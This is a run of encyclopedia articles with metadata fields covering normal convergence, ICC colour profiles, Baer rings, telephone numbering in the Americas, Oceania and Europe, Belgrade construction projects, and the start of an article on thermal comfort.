Normal convergence implies uniform absolute convergence, i.e., uniform convergence of the series of nonnegative functions \sum_n |f_n(x)|; this fact is essentially the Weierstrass M-test. However, they should not be confused; to illustrate this, consider

f_n(x) = \begin{cases} 1/n, & x \in [n, n+1) \\ 0, & \text{otherwise.} \end{cases}

Then the series \sum_n f_n is uniformly convergent (for any ε take n ≥ 1/ε), but the series of uniform norms is the harmonic series and thus diverges. An example using continuous functions can be made by replacing these functions with bump functions of height 1/n and width 1 centered at each natural number n. As well, normal convergence of a series is different from norm-topology convergence, i.e. convergence of the partial sum sequence in the topology induced by the uniform norm. Normal convergence implies norm-topology convergence if and only if the space of functions under consideration is complete with respect to the uniform norm. (The converse does not hold even for complete function spaces: for example, consider the harmonic series as a sequence of constant functions.)

Generalizations

Local normal convergence

A series can be called "locally normally convergent on X" if each point x in X has a neighborhood U such that the series of functions f_n restricted to the domain U is normally convergent, i.e. such that

\sum_{n} \|f_n\|_U < \infty,

where the norm \|\cdot\|_U is the supremum over the domain U.

Compact normal convergence

A series is said to be "normally convergent on compact subsets of X" or "compactly normally convergent on X" if for every compact subset K of X, the series of functions f_n restricted to K is normally convergent on K. Note: if X is locally compact (even in the weakest sense), local normal convergence and compact normal convergence are equivalent.

Properties

Every normally convergent series is uniformly convergent, locally uniformly convergent, and compactly uniformly convergent. This is very important, since it assures that any re-arrangement of the series, any derivatives or integrals of the series, and sums and products with other convergent series will converge to the "correct" value. If \sum_n f_n is normally convergent to f, then any re-arrangement of the sequence also converges normally to the same f. That is, for every bijection \sigma : \mathbb{N} \to \mathbb{N}, \sum_n f_{\sigma(n)} is normally convergent to f.

See also
Modes of convergence (annotated index)

References
Mathematical analysis
Convergence (mathematics)
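As a worked check of the counterexample above (a sketch relying only on the disjointness of the supports [n, n+1) described in the text):

\|f_n\| = \sup_{x} |f_n(x)| = \frac{1}{n}
\quad\Longrightarrow\quad
\sum_{n \ge 1} \|f_n\| = \sum_{n \ge 1} \frac{1}{n} = \infty
\quad \text{(harmonic series: not normally convergent),}

while, because at each point x at most one term of the tail is nonzero,

\sup_{x} \Big| \sum_{n > N} f_n(x) \Big| \le \sup_{n > N} \frac{1}{n} = \frac{1}{N+1} \longrightarrow 0 \text{ as } N \to \infty
\quad \text{(uniformly convergent).}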
Normal convergence
[ "Mathematics" ]
588
[ "Sequences and series", "Mathematical analysis", "Convergence (mathematics)", "Functions and mappings", "Mathematical structures", "Mathematical objects", "Mathematical relations" ]
7,455,109
https://en.wikipedia.org/wiki/ICC%20profile
In color management, an ICC profile is a set of data that characterizes a color input or output device, or a color space, according to standards promulgated by the International Color Consortium (ICC). Profiles describe the color attributes of a particular device or viewing requirement by defining a mapping between the device source or target color space and a profile connection space (PCS). This PCS is either CIELAB (L*a*b*) or CIEXYZ. Mappings may be specified using tables, to which interpolation is applied, or through a series of parameters for transformations. Every device that captures or displays color can be profiled. Some manufacturers provide profiles for their products, and there are several products that allow an end-user to generate their own color profiles, typically through the use of a tristimulus colorimeter or a spectrophotometer (sometimes called a spectrocolorimeter). The ICC defines the format precisely but does not define algorithms or processing details. This means there is room for variation between different applications and systems that work with ICC profiles. Two main generations are used: the legacy ICCv2 and the December 2001 ICCv4. The current version of the format specification (ICC.1) is 4.4. ICC has also published a preliminary specification for iccMAX (ICC.2) or ICCv5, a next-generation color management architecture with significantly expanded functionality and a choice of colorimetric, spectral or material connection space.

Details

To see how this works in practice, suppose we have a particular RGB and CMYK color space, and want to convert from this RGB to that CMYK. The first step is to obtain the two ICC profiles concerned. To perform the conversion, each RGB triplet is first converted to the profile connection space (PCS) using the RGB profile. If necessary, the PCS is converted between CIELAB and CIEXYZ, a well-defined transformation. Then the PCS is converted to the four values of C, M, Y, K required using the second profile. So a profile is essentially a pair of mappings: one from a color space to the PCS, and a second from the PCS to the color space. A mapping might be implemented using tables of color values to be interpolated, or be implemented using a series of mathematical formulae. (A code sketch of this two-profile conversion appears after the standards list below.) A profile might define several mappings, according to rendering intent. These mappings allow a choice between closest possible color matching and remapping the entire color range to allow for different gamuts. The reference illuminant of the profile connection space (PCS) is a 16-bit fractional approximation of D50; its white point is XYZ = (0.9642, 1.000, 0.8249). Different source/destination white points are adapted using the Bradford transformation. Another kind of profile is the device link profile. Instead of mapping between a device color space and a PCS, it maps between two specific device spaces. While this is less flexible, it allows for a more accurate or purposeful conversion of color between devices. For example, a conversion between two CMYK devices could ensure that colors using only black ink convert to target colors using only black ink.

References in standards

The ICC profile specification, currently being progressed as International Standard ISO 15076-1:2005, is widely referred to in other standards. The following International and de facto standards are known to make reference to ICC profiles.
International standards
ISO/IEC 10918-1: Coding of still pictures – JPEG
ISO 12234-2: Electronic still-picture imaging – Removable memory – Part 2: TIFF/EP image data format (ISO TC42)
ISO 12639:2004 Graphic technology – Prepress digital data exchange – Tag Image File Format for Image Technology (TIFF/IT) (ISO TC130)
ISO/DIS 12647-1: Graphic Technology – Process control for the production of halftone color separations, proof and production prints – Part 1: Parameters and measurement methods (revision under way in ISO TC130)
ISO/DIS 12647-2: Graphic Technology – Process control for the production of halftone color separations, proof and production prints – Part 2: Offset processes (revision under way in ISO TC130)
ISO/CD 12647-3: Graphic technology – Process control for the production of half-tone color separations, proofs and production prints – Part 3: Coldset offset lithography on newsprint
ISO/CD 12647-4: Graphic technology – Process control for the production of half-tone color separations, proof and production prints – Part 4: Publication gravure printing
ISO/CD 12647-6: Graphic technology – Process control for the production of half-tone color separations, proof and production prints – Part 6: Flexographic printing
ISO/IEC 15948: Portable Network Graphics file format (jointly defined with W3C – see www.libpng.org/pub/png/spec/iso)
ISO/IEC 15444: Coding of still pictures – JPEG 2000 (ISO JTC 1/SC 2)
ISO 15930-1:2001 Graphic technology – Prepress digital data exchange – Use of PDF. Part 1: Complete exchange using CMYK data (PDF/X-1 and PDF/X-1a) (ISO TC130)
ISO 15930-3:2002 Graphic technology – Prepress digital data exchange – Use of PDF. Part 3: Complete exchange suitable for color managed workflows (PDF/X-3) (ISO TC130)
ISO 15930-4:2003 Graphic technology – Prepress digital data exchange using PDF – Part 4: Complete exchange of CMYK and spot color printing data using PDF 1.4 (PDF/X-1a)
ISO 15930-5:2003 Graphic technology – Prepress digital data exchange using PDF – Part 5: Partial exchange of printing data using PDF 1.4 (PDF/X-2)
ISO 15930-6:2003 Graphic technology – Prepress digital data exchange using PDF – Part 6: Complete exchange of printing data suitable for color-managed workflows using PDF 1.4 (PDF/X-3)
ISO 22028-1:2004 Photography and Graphic Technology – Extended color encodings for digital image storage, manipulation and interchange – Part 1: Architecture and requirements (ISO TC42)
ISO 12052 / NEMA PS3 Digital Imaging and Communications in Medicine (DICOM)
ISO 32000-2 PDF Portable Document Format (international standard; originally authored by Adobe Systems, Inc.)

De facto standards
PICT standard specifications (file format published by Apple Computer Inc.)
PostScript Language (EPS file format published by Adobe Systems Inc.)
JDF v1.1 Revision A (Job Definition Format published by the CIP4 consortium)
SVG (Scalable Vector Graphics) version 1.1 (file format defined by W3C, available from https://www.w3.org/TR/SVG/)
SWOP (Specifications for Web Offset Publications), used for CMYK print jobs, primarily in the United States

See also
Color management
Digital printing
International Color Consortium

References

External links
ICC Frequently Asked Questions
ICC profile specification
ICC profiles for CMYK systems
Is your system ICC Version 4 ready? – A test page for browsers
Color space
1994 introductions
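To make the two-profile conversion described under Details concrete, here is a minimal Python sketch using Pillow's ImageCms module (a wrapper around LittleCMS). The profile file names are placeholders for whichever ICC profiles are actually at hand; treat this as an illustration of the RGB → PCS → CMYK flow rather than a definitive implementation.

from PIL import Image, ImageCms

# Load an RGB image and the two ICC profiles (file names are placeholders).
im = Image.open("photo.jpg").convert("RGB")
rgb_profile = ImageCms.getOpenProfile("sRGB.icc")         # source: RGB -> PCS
cmyk_profile = ImageCms.getOpenProfile("print_cmyk.icc")  # destination: PCS -> CMYK

# Build a transform that chains the two mappings through the PCS,
# with a chosen rendering intent.
transform = ImageCms.buildTransform(
    rgb_profile,
    cmyk_profile,
    inMode="RGB",
    outMode="CMYK",
    renderingIntent=ImageCms.INTENT_PERCEPTUAL,
)

# Apply the transform; every RGB triplet is mapped through the PCS to CMYK.
cmyk_im = ImageCms.applyTransform(im, transform)
cmyk_im.save("photo_cmyk.tif")

Swapping the rendering intent (for example INTENT_RELATIVE_COLORIMETRIC) selects a different mapping from the profile, corresponding to the choice between closest-color matching and gamut remapping described above.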
ICC profile
[ "Mathematics" ]
1,510
[ "Color space", "Space (mathematics)", "Metric spaces" ]
7,455,223
https://en.wikipedia.org/wiki/Baer%20ring
In abstract algebra and functional analysis, Baer rings, Baer *-rings, Rickart rings, Rickart *-rings, and AW*-algebras are various attempts to give an algebraic analogue of von Neumann algebras, using axioms about annihilators of various sets. Any von Neumann algebra is a Baer *-ring, and much of the theory of projections in von Neumann algebras can be extended to all Baer *-rings. For example, Baer *-rings can be divided into types I, II, and III in the same way as von Neumann algebras. In the literature, left Rickart rings have also been termed left PP-rings. ("Principal implies projective": see definitions below.)

Definitions

An idempotent element of a ring is an element e which has the property that e² = e. The left annihilator of a set X ⊆ R is

{r ∈ R : rX = {0}}.

A (left) Rickart ring is a ring satisfying any of the following conditions:

the left annihilator of any single element of R is generated (as a left ideal) by an idempotent element.
(For unital rings) the left annihilator of any element is a direct summand of R.
All principal left ideals (ideals of the form Rx) are projective R-modules.

A Baer ring is a ring satisfying any of the following conditions:

The left annihilator of any subset of R is generated (as a left ideal) by an idempotent element.
(For unital rings) The left annihilator of any subset of R is a direct summand of R.

For unital rings, replacing all occurrences of 'left' with 'right' yields an equivalent definition; that is to say, the definition is left-right symmetric. In operator theory, the definitions are strengthened slightly by requiring the ring R to have an involution x ↦ x*. Since this makes R isomorphic to its opposite ring R^op, the definition of Rickart *-ring is left-right symmetric. A projection in a *-ring is an idempotent p that is self-adjoint (p* = p). A Rickart *-ring is a *-ring such that the left annihilator of any element is generated (as a left ideal) by a projection. A Baer *-ring is a *-ring such that the left annihilator of any subset is generated (as a left ideal) by a projection. An AW*-algebra, introduced by Kaplansky, is a C*-algebra that is also a Baer *-ring.

Examples

Since the principal left ideals of a left hereditary ring or left semihereditary ring are projective, it is clear that both types are left Rickart rings. This includes von Neumann regular rings, which are left and right semihereditary. If a von Neumann regular ring R is also right or left self-injective, then R is Baer.
Any semisimple ring is Baer, since all left and right ideals are summands in R, including the annihilators.
Any domain is Baer, since all annihilators are {0}, except for the annihilator of 0, which is R, and both {0} and R are summands of R.
The ring of bounded linear operators on a Hilbert space is a Baer ring, and is also a Baer *-ring with the involution * given by the adjoint.
Von Neumann algebras are examples of all the different sorts of ring above.

Properties

The projections in a Rickart *-ring form a lattice, which is complete if the ring is a Baer *-ring.

See also
Baer *-semigroup

Notes
References
Von Neumann algebras
Ring theory
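As a small worked illustration of these definitions, consider the ring R = k × k for a field k, with componentwise operations (an example chosen here for illustration; it is not drawn from the text above):

\text{For } x = (1, 0):\qquad
\mathrm{l.ann}(x) = \{(a,b) \in R : (a,b)(1,0) = (0,0)\} = \{0\} \times k = Re, \qquad e = (0,1),\ e^2 = e.

Every subset of R has left annihilator equal to one of \{0\}\times\{0\},\ k\times\{0\},\ \{0\}\times k, or k\times k, each generated by one of the idempotents (0,0), (1,0), (0,1), (1,1); hence R is a Baer ring. With the trivial involution (a,b)^* = (a,b), each of these idempotents is a projection, making R a Baer *-ring as well.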
Baer ring
[ "Mathematics" ]
771
[ "Fields of abstract algebra", "Ring theory" ]
7,455,244
https://en.wikipedia.org/wiki/Telephone%20numbers%20in%20the%20Americas
All countries in the Americas use country codes that start with "5", with the exception of the countries of the North American Numbering Plan, such as Canada and the United States, which use country code 1, and Greenland and Aruba, whose country codes start with the digit "2", which is mostly used by countries in Africa.

See also
Telephone numbering plan
National conventions for writing telephone numbers
List of country calling codes
List of international call prefixes
List of North American Numbering Plan area codes
Area codes in the Caribbean
:Category:Telephone numbers by country
International telecommunications
Telecommunications in Central America
Telecommunications in the Caribbean
Telecommunications in North America
Telecommunications in South America
Telephone numbers
Telephone numbers in the Americas
[ "Mathematics" ]
130
[ "Mathematical objects", "Numbers", "Telephone numbers" ]
7,455,266
https://en.wikipedia.org/wiki/Telephone%20numbers%20in%20Oceania
Telephone numbers in Oceania use a variety of area codes to denote their location, along with their own country code depending on the country's geographic makeup. They also have other prefixes to denote different types of mobile services and international calls. There are exceptions because of regional variations and time zones.

Australia

Country Code: +61
International Call Prefix: 0011
Trunk Prefix: 0

Telephone numbers in Australia consist of a single-digit area code (prefixed with a '0' when dialing within Australia) and eight-digit local numbers, the first four, five or six of which specify the exchange, and the remaining four, three or two a line at that exchange. (Most exchanges, though, have several exchange codes.) Within Australia, the area code is only required when calling from one area code to another. Australia is divided geographically into a small number of large area codes, some of which cover more than one state and territory. Prior to the introduction of eight-digit numbers in the early-to-mid-1990s, telephone numbers were seven digits in the major capital cities, with a double-digit area code, and six digits in other areas, with a three-digit area code. There were more than sixty such codes by 1990, with numbers running out, thus spurring the reorganization. Following the reorganization of the numbering plan between 1994 and 1998, the following numbering ranges are now used:

00 International and emergency access
01 Alternative phone services
014 Satellite phones
0163 Pager numbers
0198 Data numbers (e.g. 0198 308 888 is the dial-up PoP number for Telstra)
02 Geographic: Central East region (New South Wales and the Australian Capital Territory)
03 Geographic: South-east region (Victoria and Tasmania)
04 Digital mobile services (3G, 4G, 5G and GSM)
0550 Location Independent Communication Services
07 Geographic: North-east region (Queensland) and Tweed Heads
08 Geographic: Central and West region (South Australia, Northern Territory, Western Australia) and Broken Hill
1 Non-geographic numbers (mostly for domestic use only)

National numbers have no geographic significance; other numbers relate to a particular telephone service area. However, allowances are made for regional variations; sometimes the codes do not strictly follow state borders. For example, Broken Hill in New South Wales uses the 08 area code, due to its closer proximity to Adelaide than to the state capital Sydney, and the Broken Hill area's inclusion in the Australian Central Standard Time zone. The previous area code for Broken Hill was (080). Other examples include towns in southern New South Wales close to the border with Victoria that use the 03 (Victoria and Tasmania) prefix, including Balranald, Wentworth and Deniliquin. Some parts of the Tweed Coast of New South Wales have an area code of 07 followed by a subscriber number of 55xx xxxx (and new numbers 56xx xxxx). This means it costs only a local call to phone the Gold Coast in neighbouring Queensland, since the metropolis covers both sides of the NSW/Qld border. It is also a local call to adjoining NSW 02 667x xxxx numbers from these areas, and other southern Gold Coast exchanges (07-prefix numbers must dial the 02 to access these).
Australian Antarctic Territory
Country Code: +672 1x
International Call Prefix: 00
Trunk Prefix:

Christmas Island
Country Code: +61 8 9164 – part of the Australian numbering system
International Call Prefix: 0011
Trunk Prefix: 0

Cocos (Keeling) Islands
Country Code: +61 8 9162 – part of the Australian numbering system
International Call Prefix: 0011
Trunk Prefix: 0

Norfolk Island
Country Code: +672 3
International Call Prefix: 00
Trunk Prefix:

Easter Island
Country Code: +56 32
International Call Prefix: 00
Trunk Prefix:

East Timor
Country Code: +670
International Call Prefix: 00
Trunk Prefix:

Federated States of Micronesia
Country Code: +691
International Call Prefix: 00
Trunk Prefix:

Fiji
Country Code: +679
International Call Prefix: 00
Trunk Prefix:

French Polynesia
Country Code: +689
International Call Prefix: 00
Trunk Prefix:

Kiribati
Country Code: +686
International Call Prefix: 00
Trunk Prefix:

Marshall Islands
Country Code: +692
International Call Prefix: 00
Trunk Prefix:

Nauru
Country Code: +674
International Call Prefix: 00
Trunk Prefix:

New Caledonia
Country Code: +687
International Call Prefix: 00
Trunk Prefix:

New Zealand
Country Code: +64
International Call Prefix: 00
Trunk Prefix: 0

Since 1993, land-line telephone numbers in New Zealand consist of a single-digit area code and seven-digit local numbers, the first three of which generally specify the exchange and the final four a line at that exchange. The domestic long-distance prefix is '0'. The dialing plan used in New Zealand reflects the national structure implemented by the New Zealand Post Office prior to the privatisation of telecommunications services (and the creation of the Telecom New Zealand corporation). Domestic phone numbers with a first digit in the range 2–8 are generally managed by Telecom. Phone numbers beginning with 9 are usually those from other companies, for example TelstraClear. These allocations were firm until April 2007, whereupon full number portability was introduced; numbers can now be moved between carriers. There are currently no regions issued numbers starting with 1, except for the national emergency services access number, '111'. There are five regional area codes in use for landline calls. For example, a domestic toll call destined for a South Island location requires the dial prefix '03', being domestic-long-distance '0' + '3' for the South Island. Mobile phone numbers are prefixed with 02, followed by one digit and the subscriber's number, which is either six, seven or eight digits, dialled in full, e.g. 021 xxx xxx or 027 xxx xxxx. With the introduction of number portability, the number prefix is no longer a sure indicator as to the terminating network. Free-call services generally use the prefix 0800 (via Telecom NZ) or 0508 (via TelstraClear), while local-rate services (usually internet access numbers) have the prefix 08xx. Premium-rate services use the code 0900 followed by five digits. Neither of these is accessible internationally. The international dialing prefix is '00', though other prefixes are available (e.g. 0161 for discounted rates, or 0168 for access to USA 1800 numbers). To dial into New Zealand from overseas, the leading 0 should be dropped from all area codes. (For example, an 021 xxx xxxx number would be reached by dialing +64 21 xxx xxxx.)
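The "drop the trunk 0, prepend the country code" rule described above (which applies equally to Australia's +61 and New Zealand's +64) can be written as a short sketch. This is a simplification for illustration only: the function name and example digits are invented here, and special-rate numbers (0800, 0900, etc.) are deliberately not handled.

def to_e164(national_number: str, country_code: str = "64") -> str:
    """Convert a nationally formatted number (e.g. '021 xxx xxxx') to E.164 form.

    Assumes a trunk prefix of '0', as in Australia (+61) and New Zealand (+64).
    """
    digits = "".join(ch for ch in national_number if ch.isdigit())
    if digits.startswith("0"):
        digits = digits[1:]  # drop the trunk prefix when dialing from overseas
    return "+" + country_code + digits

# Illustrative examples (dummy digits):
print(to_e164("021 123 4567"))        # NZ mobile      -> +64211234567
print(to_e164("02 9876 5432", "61"))  # AU (02) number -> +61298765432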
Cook Islands Country Code: +682 International Call Prefix: 00 Trunk Prefix: Niue Country Code: +683 International Call Prefix: 00 Trunk Prefix: Tokelau Country Code: +690 International Call Prefix: 00 Trunk Prefix: Palau Country Code: +680 International Call Prefix: 011 or 012 Trunk Prefix: Papua New Guinea Country Code: +675 International Call Prefix: 00 Trunk Prefix: Pitcairn Islands Country Code: +64 xx – previously +870 satellite phone only International Call Prefix: 00 Trunk Prefix: Samoa Country Code: +685 International Call Prefix: 0 Trunk Prefix: Solomon Islands Country Code: +677 International Call Prefix: 00 or 01 Trunk Prefix: Tonga Country Code: +676 International Call Prefix: 00 Trunk Prefix: Tuvalu Country Code: +688 International Call Prefix: 00 Trunk Prefix: United States Territories The following territories of the United States are part of the North American Numbering Plan, and no longer have their own country codes: +1-670 - Northern Mariana Islands from 1 July 1998 (previously +670) +1-671 - Guam from 1 July 1998 (previously +671) +1-684 - American Samoa from 2 October 2004 (previously +684) Vanuatu Country Code: +678 International Call Prefix: 00 Trunk Prefix: Wallis and Futuna Country Code: +681 International Call Prefix: 00 Trunk Prefix: See also List of country calling codes List of international call prefixes Telephone numbering plan :Category:Telephone numbers by country References International telecommunications Telecommunications in Oceania Telephone numbers Telecommunications in Australia Telecommunications in New Zealand
Telephone numbers in Oceania
[ "Mathematics" ]
1,720
[ "Mathematical objects", "Numbers", "Telephone numbers" ]
7,455,277
https://en.wikipedia.org/wiki/List%20of%20architectural%20projects%20in%20Belgrade
There are many architectural projects under construction in Belgrade, Serbia. Since 2002, Belgrade has experienced a major construction boom. These are only some of the projects under construction in Belgrade:

Under construction

Residential, office and retail projects:

New Belgrade
Airport City Belgrade: Under construction is one 14-story building with underground garages. Three new buildings, including a Crowne Plaza hotel, will start in 2020. Airport Garden residential buildings started in 2019.
Wellport Belgrade: Condominium project started in 2018. Estimated cost is 130 million Euros.
Savada 3: New residential project in New Belgrade.
Zep Terra: Mixed-use project by Zepter International. It will have 75,000 sqm of residential and 20,000 sqm of office space.
Sakura Park Belgrade: 228 apartments.
New Minel: The project will have 120,000 sq meters of residential space. Investment estimated at approximately 100 million Euros.
Exing Home 65: Residential project of 24,000 sq meters.
Park 11: Residential project by Energoprojekt.
BLOK 23: Office project of 50,000 sqm of premium office space in Block 23. After 8 years on hold, a new owner is finishing the project.
Tempo Tower: Business and residential project of 112,000 sq meters, 120 meters tall.

Old City Belgrade
Belgrade Waterfront: One of the biggest construction projects in Europe, with an estimated investment of 3.5 billion Euros.
Belgrade Skyline: 200 million Euro project; three towers with heights of 132 m, 120 m and 102 m. Started in 2017.
Dorcol Centar: New residential project in Cara Dusana street.
K-District: New office-residential project in the oldest part of the city, next to the city zoo and Kalemegdan fortress. Investment 90 million Euros.
Kneza Milosa Residence: 150 million Euros for a new residential block in Kneza Milosa street, on the site of the former US Embassy.
New Dorcol: Residential project of 100,000 sq meters in Lower Dorcol.

Other parts of the city
Vila Banjica: 280,000 sqm new gated residential project.
Vozdova Kapija: Residential condo project of 170 million Euros. Project started in 2017.
Zemunske Kapije: Business and residential project.
East Side Complex: 34,000 sqm residential project.
Big Residences: Total investment of 200 million Euros, under construction next to the Big shopping mall. Almost 1,100 apartments will be constructed, with 2,200 parking spots. The first phase of the shopping area opened in December 2019.
IKEA Retail Center: Additional center next to IKEA Istok. It will have 40,000 sq m and will cost 70 million Euros.

Transportation, medical and infrastructural projects
Belgrade Metro: Two lines totalling 42 km under construction. The first line will open in 2028, the second in 2030. Total cost 9 billion Euros.
Belgrade bypass: The new Orlovaca and Batajnica interchanges and a connection to the Bubanj Potok bypass with a new interchange are under construction.
Belgrade Centre railway station: A mega-project scheduled to begin in September 2020, resulting in the relocation of the main railway station and its railway tracks, which will consequently free up building space in Belgrade's inner centre. The entire project is worth an estimated 2 billion US dollars and is scheduled to be completed within a decade. The Serbian company Energoprojekt will invest €200 million. Over a billion dollars has already been invested.
Makis 2: Water production facility.
Tirsova 2: New children's hospital next to the Tirsova 1 hospital; construction scheduled for 2020. 75 million Euros.
Interceptor Collector: Sewer system collector under construction. Estimated cost 500 million US dollars.
Belgrade–Budapest high-speed railroad: Construction started in 2017.
Vinca Waste Management and Bioenergy Plant: Construction started in 2017. Project worth 300 million Euros and managed by Vinci SA.
Heating system pipe connection between the Nikola Tesla Power Plant and the New Belgrade heating plant: Investment 190 million Euros from Power Construction Corporation of China. Started in 2018.
Veliko Selo sewage treatment plant with additional interceptor: Power Construction Corporation of China is the contractor. Investment 385 million Euros in Phase 1. Started in 2018.
Belgrade Nikola Tesla Airport expansion: By Vinci SA, worth 770 million Euros.
Clinical Centre of Serbia: Upgrade and expansion of the main building. Started in late 2018. Project cost 110 million Euros.
Belgrade Bus Station: A new BAS station is under construction in New Belgrade. Construction started in 2019. The old main station in the Old Town has been demolished.
New Belgrade Railway Station: Undergoing expansion and reconstruction.

Planned projects
The Old Airport: Congress center in New Belgrade with a 35-storey tower (144 m).
Kopernikus Residential Towers: In New Belgrade; twin towers of 156 meters.
Merin Tower: Mixed-use tower next to the NCR Campus in Block 42. It will have 28 floors and a height of 100 m.
Alta Tower: 28-floor residential tower in New Belgrade.
Delta Center Block 20: Twin towers of 100 m height in Block 20, New Belgrade. One tower will be a Hotel Intercontinental. Planned for 2021.
Kempinski Hotel (reconstruction of Hotel Jugoslavija): In New Belgrade on the banks of the Danube. The expansion will add two twin 144 m tall, 33-story skyscrapers. Casino Austria has already invested about €60 million.
Novak Tennis Center: Will be built in New Belgrade's Blok 45. The complex will consist of 20–30 smaller tennis courts and one main court with 5,000 seats. The center will also have a tennis academy, a hotel, a hostel and other facilities. One of the owners will be tennis ace Novak Djokovic, after whom it is named.
IKEA Zapad: Another IKEA store, to be located close to the airport.
Belgrade–Zrenjanin Expressway: A new 57 km expressway worth 300 million Euros.
Ada Huja Bridge: New bridge across the river Danube. Construction starts in 2020; the project is worth 120 million Euros.
National Stadium: Will be constructed in the Municipality of Surcin. It will have 65,000 seats and will cost around 250 million Euros.

Recently finished projects
GTC X: New office building in New Belgrade. Opened in 2022.
NCR Corporation Campus: Will employ 5,000 employees and cost 90 million dollars. Opened in 2022.
Chinese Cultural Center Belgrade: One of the biggest Chinese cultural centers in the world, with a total of 32,000 sq meters, located where the Chinese Embassy bombed in 1999 stood; it is the largest Chinese Cultural Center in Europe. Total investment 45 million Euros. Opened in 2022.
West 65: Project of 152,000 sq m and a 40-storey tower (155 m) in New Belgrade. The tallest residential skyscraper in Belgrade; opened in 2022.
Dedinje 2: New cardiac surgery hospital next to the Dedinje 1 hospital. Opened in 2021.
Batajnica Hospital: A new 18,000 sqm hospital in the Batajnica suburb. Construction was completed in just four months. Opened in December 2020.
Sirius Business Center: Last phase finished in December 2020.
GTC Green Heart: Business complex of 87,000 square meters in New Belgrade. Opened in October 2020.
MPC Navigator 2: Office building next to the earlier-finished Navigator 1 in New Belgrade. Opened in September 2020.
Ostružnica Bridge: The second half, with three lanes, opened in June 2020 as part of the Belgrade beltway ring.
Usce Tower 2: Twin tower next to Usce Tower in New Belgrade. Opened in June 2020.
BEO Shopping Mall: 130,000 sqm in Zvezdara municipality. Opened in June 2020.
A Block: 200,000 sq m of office and residential space. Investment 200 million Euros. Finished in 2019.
Expressway Surcin–Obrenovac: A new 17 km expressway with the new Obrenovac–Surčin Bridge (A2 motorway), part of the new expressway toward Montenegro. Opened in December 2019.
Meita Baric: Car parts factory with an investment of 200 million Euros. Opened in Baric in 2019.
Ada Mall: The project consists of 34,000 sq m and cost 100 million Euros. Opened in 2019.
Central Garden: A 200-million-Euro project started in 2015. The project was completed in 2019.
Big Fashion Karaburma: Big CEE invested 70 million Euros. Opened in 2017.
Rajiceva Shopping Mall: With Mama Shelter hotel, on Knez Mihajlova street. Opened in 2017; investment €80 million.
IKEA Istok: One of the biggest IKEA stores in Europe. The second phase will include an additional mall. Opened in 2017.

References
Economy of Belgrade
Belgrade, projects
Architectural projects
List of architectural projects in Belgrade
[ "Engineering" ]
1,692
[ "Architecture lists", "Architecture" ]
7,455,543
https://en.wikipedia.org/wiki/Telephone%20numbers%20in%20Europe
Telephone numbers in Europe are managed by the national telecommunications authorities of each country. Most country codes start with 3 or 4, but some countries that by the Copenhagen criteria are considered part of Europe have country codes starting with digits most common outside of Europe (e.g. the Faroe Islands of Denmark have a code starting with the digit 2, which is mostly used by countries in Africa). The international access code (dial-out code) has been standardized as 00, as recommended by the International Telecommunication Union (ITU).

European Economic Area

Other European countries/territories

† = Disputed state; may not be recognized as an independent state by some or all European Union members.

*A variable dialing plan has different dialing procedures for local and long-distance telephone calls. A call within the same city or within an area is dialed using only the subscriber number, while for calls outside the area the telephone number must be prefixed with the destination area code. A fixed dialing plan requires dialing all digits of the complete telephone number, including any area codes.

Harmonized service numbers

The following service numbers are harmonized across the European Union:
112 for emergency services
116xxx for (other) harmonized services of social value

Single numbering plan (1996 proposal)

In 1996, the European Commission proposed the introduction of a single telephone numbering plan, in which all European Union member states would use the country code 3. Calls between member states would no longer require the international access code 00. Instead, the digit 1 was proposed for these calls, replaced by the country code 3 for calls from outside the EU. Each country would have a two-digit country code after the 1 or the 3. Calls within each country would not be affected. This proposal would have required states such as Germany, the United Kingdom, Denmark and others, whose country codes began with the digit '4', to return these to the International Telecommunication Union. A Green Paper on the proposal was published, but the disruption and inconvenience of the change were deemed to outweigh any advantages. One disadvantage would have been that every local number beginning with "1" would have had to be changed (except emergency numbers, which would have been kept). Another disadvantage would have been misdialing with old numbers: people wanting to call France (e.g. Southeast France using +33 4...) using an old number would have connected to another country, such as Spain, and people wanting to call Spain (e.g. +34 9...) would have ended up in, for example, Germany. The EU proposal should not be confused with the European Telephony Numbering Space (ETNS), which uses the country code 388, and was intended to complement, rather than replace, existing national numbering plans.

See also
Telephone numbering plan
National conventions for writing telephone numbers
European Union roaming regulations
List of country calling codes
List of international call prefixes
:Category:Telephone numbers by country

Notes
References

External links
World Telephone Numbering Guide
International telecommunications
Telephone numbers
Telecommunications in Europe
Telephone numbers in Europe
[ "Mathematics" ]
604
[ "Mathematical objects", "Numbers", "Telephone numbers" ]
7,455,643
https://en.wikipedia.org/wiki/Thermal%20comfort
Thermal comfort is the condition of mind that expresses subjective satisfaction with the thermal environment. The human body can be viewed as a heat engine where food is the input energy. The human body will release excess heat into the environment, so the body can continue to operate. The heat transfer is proportional to the temperature difference. In cold environments, the body loses more heat to the environment, and in hot environments the body does not release enough heat. Both the hot and cold scenarios lead to discomfort. Maintaining this standard of thermal comfort for occupants of buildings or other enclosures is one of the important goals of HVAC (heating, ventilation, and air conditioning) design engineers. Thermal neutrality is maintained when the heat generated by human metabolism is allowed to dissipate, thus maintaining thermal equilibrium with the surroundings. The main factors that influence thermal neutrality are those that determine heat gain and loss, namely metabolic rate, clothing insulation, air temperature, mean radiant temperature, air speed and relative humidity. Psychological parameters, such as individual expectations, and physiological parameters also affect thermal neutrality. Neutral temperature is the temperature that can lead to thermal neutrality, and it may vary greatly between individuals depending on factors such as activity level, clothing, and humidity. People are highly sensitive to even small differences in environmental temperature. At 24 °C, a difference of 0.38 °C can be detected between the temperature of two rooms. The Predicted Mean Vote (PMV) model stands among the most recognized thermal comfort models. It was developed using principles of heat balance and experimental data collected in a controlled climate chamber under steady-state conditions. The adaptive model, on the other hand, was developed based on hundreds of field studies, with the idea that occupants dynamically interact with their environment. Occupants control their thermal environment by means of clothing, operable windows, fans, personal heaters, and sun shades. The PMV model can be applied to air-conditioned buildings, while the adaptive model can be applied only to buildings where no mechanical systems have been installed. There is no consensus about which comfort model should be applied for buildings that are partially air-conditioned, spatially or temporally. Thermal comfort calculations in accordance with the ANSI/ASHRAE Standard 55, the ISO 7730 Standard and the EN 16798-1 Standard can be freely performed with the CBE Thermal Comfort Tool for ASHRAE 55, with the Python package pythermalcomfort, or with the R package comf.

Significance

